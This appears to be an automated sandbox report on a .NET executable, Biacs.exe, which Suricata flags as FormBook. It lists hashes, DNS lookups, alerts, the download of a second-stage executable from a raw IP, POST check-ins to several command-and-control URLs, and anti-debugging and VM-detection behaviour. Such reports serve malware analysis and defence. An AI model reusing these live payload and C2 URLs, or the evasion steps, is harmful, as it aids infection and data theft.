Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 1, 2023, 7:32 p.m.	Nov. 1, 2023, 7:34 p.m.

Size	78.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`8bbba1d1448825a0c428dc296573cf8d`
SHA256	`b188344a58c4dfd482b417ffbc27fbc2b2d72b672653060f2fe33e86102c31f8`
CRC32	`24983EC3`
ssdeep	`1536:DKCCVE7xYFCQmUl9XxUGPsisuHzrC37wi8MqK+ig:DCiK9XxUGPsisuHzrC37wi8MqNf`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description)

Biacs.exe "C:\Users\test22\AppData\Local\Temp\Biacs.exe"
2552
- Biacs.exe C:\Users\test22\AppData\Local\Temp\Biacs.exe
  2756

Name	Response	Post-Analysis Lookup
www.poultry-symposium.com	A 85.128.134.237	85.128.134.237
www.palatepursuits.cfd	A 104.21.21.57 A 172.67.196.133	104.21.21.57
www.frefire.top	A 67.223.117.37	67.223.117.37
www.8956kjw1.com	CNAME cname.bf723.com A 103.71.154.243	103.71.154.243
www.tsygy.com	A 23.104.137.185	23.104.137.185
www.pengeloladata.click
www.siteapp.fun
www.theartboxslidell.com	A 23.82.12.35	23.82.12.35
www.xxkxcfkujyeft.xyz	A 142.171.29.133 CNAME xxkxcfkujyeft.xyz	142.171.29.133
www.prosourcegraniteinc.com	A 216.239.34.21 A 216.239.36.21 A 216.239.38.21 A 216.239.32.21	216.239.32.21
www.flyingfoxnb.com	A 216.40.34.41	216.40.34.41
www.onlyleona.com	A 172.67.132.228 A 104.21.13.143	104.21.13.143
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
103.71.154.243	Active	Moloch
142.171.29.133	Active	Moloch
164.124.101.2	Active	Moloch
172.67.132.228	Active	Moloch
172.67.196.133	Active	Moloch
192.3.64.154	Active	Moloch
216.239.36.21	Active	Moloch
216.40.34.41	Active	Moloch
23.104.137.185	Active	Moloch
23.82.12.35	Active	Moloch
45.33.6.223	Active	Moloch
67.223.117.37	Active	Moloch
85.128.134.237	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49163 -> 192.3.64.154:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.3.64.154:80 -> 192.168.56.101:49163	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.3.64.154:80 -> 192.168.56.101:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.3.64.154:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.3.64.154:80 -> 192.168.56.101:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.101:52753 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49161 -> 192.3.64.154:80	2027265	ET INFO Dotted Quad Host PDF Request	Potentially Bad Traffic
TCP 103.71.154.243:80 -> 192.168.56.101:49181	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 103.71.154.243:80 -> 192.168.56.101:49180	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 67.223.117.37:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 23.104.137.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 142.171.29.133:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 67.223.117.37:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 142.171.29.133:80	2031088	ET HUNTING Request to .XYZ Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 67.223.117.37:80	2031089	ET HUNTING Request to .TOP Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 216.239.36.21:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 172.67.132.228:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 172.67.196.133:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 23.82.12.35:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 85.128.134.237:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 216.40.34.41:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 1, 2023, 7:32 p.m.			0	0
IsDebuggerPresent Nov. 1, 2023, 7:32 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 1, 2023, 7:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0084bdf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 1, 2023, 7:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0084bdf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 1, 2023, 7:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0084b970 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 1, 2023, 7:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0084bbf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 1, 2023, 7:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0084bbf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 1, 2023, 7:32 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0084bbb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 1, 2023, 7:32 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (11 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://192.3.64.154/1906/Pxgltvs.pdf
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://192.3.64.154/1906/HtmlIEcleanerHistory.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.prosourcegraniteinc.com/kniu/?hGC=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.theartboxslidell.com/kniu/?hGC=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.xxkxcfkujyeft.xyz/kniu/?hGC=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.onlyleona.com/kniu/?hGC=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tsygy.com/kniu/?hGC=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.poultry-symposium.com/kniu/?hGC=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.frefire.top/kniu/?hGC=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.flyingfoxnb.com/kniu/?hGC=2khzscf+uoNd4qXDJMvMlsCGRf74adwr4dCZmsSaM5bi7vY8OWwGY+oUQIQbfdmtzbAFku/2CGFb1XO6VHKJWfD6Hx+uzWgInko6T2A=&iOwKE=__tE6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.palatepursuits.cfd/kniu/?hGC=hbIoOV/dmdXO2xpIn07o59QoAXcFh8OwL7wE3CCbwPL4DaTNKf4A6Fx93MICWs67Kq9ozN+vd0WYpt+cGdGxDSTpWz7Z0RqHqaDgDUU=&iOwKE=__tE6

Performs some HTTP requests (21 events)

request	GET http://192.3.64.154/1906/Pxgltvs.pdf
request	GET http://192.3.64.154/1906/HtmlIEcleanerHistory.exe
request	POST http://www.prosourcegraniteinc.com/kniu/
request	GET http://www.prosourcegraniteinc.com/kniu/?hGC=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&iOwKE=__tE6
request	GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip
request	POST http://www.theartboxslidell.com/kniu/
request	GET http://www.theartboxslidell.com/kniu/?hGC=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&iOwKE=__tE6
request	POST http://www.xxkxcfkujyeft.xyz/kniu/
request	GET http://www.xxkxcfkujyeft.xyz/kniu/?hGC=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&iOwKE=__tE6
request	POST http://www.onlyleona.com/kniu/
request	GET http://www.onlyleona.com/kniu/?hGC=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&iOwKE=__tE6
request	POST http://www.tsygy.com/kniu/
request	GET http://www.tsygy.com/kniu/?hGC=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&iOwKE=__tE6
request	POST http://www.poultry-symposium.com/kniu/
request	GET http://www.poultry-symposium.com/kniu/?hGC=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&iOwKE=__tE6
request	POST http://www.frefire.top/kniu/
request	GET http://www.frefire.top/kniu/?hGC=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&iOwKE=__tE6
request	POST http://www.flyingfoxnb.com/kniu/
request	GET http://www.flyingfoxnb.com/kniu/?hGC=2khzscf+uoNd4qXDJMvMlsCGRf74adwr4dCZmsSaM5bi7vY8OWwGY+oUQIQbfdmtzbAFku/2CGFb1XO6VHKJWfD6Hx+uzWgInko6T2A=&iOwKE=__tE6
request	POST http://www.palatepursuits.cfd/kniu/
request	GET http://www.palatepursuits.cfd/kniu/?hGC=hbIoOV/dmdXO2xpIn07o59QoAXcFh8OwL7wE3CCbwPL4DaTNKf4A6Fx93MICWs67Kq9ozN+vd0WYpt+cGdGxDSTpWz7Z0RqHqaDgDUU=&iOwKE=__tE6

Sends data using the HTTP POST Method (9 events)

request	POST http://www.prosourcegraniteinc.com/kniu/
request	POST http://www.theartboxslidell.com/kniu/
request	POST http://www.xxkxcfkujyeft.xyz/kniu/
request	POST http://www.onlyleona.com/kniu/
request	POST http://www.tsygy.com/kniu/
request	POST http://www.poultry-symposium.com/kniu/
request	POST http://www.frefire.top/kniu/
request	POST http://www.flyingfoxnb.com/kniu/
request	POST http://www.palatepursuits.cfd/kniu/

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

www.frefire.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 58 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02090000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02240000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00427000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00416000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05b9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
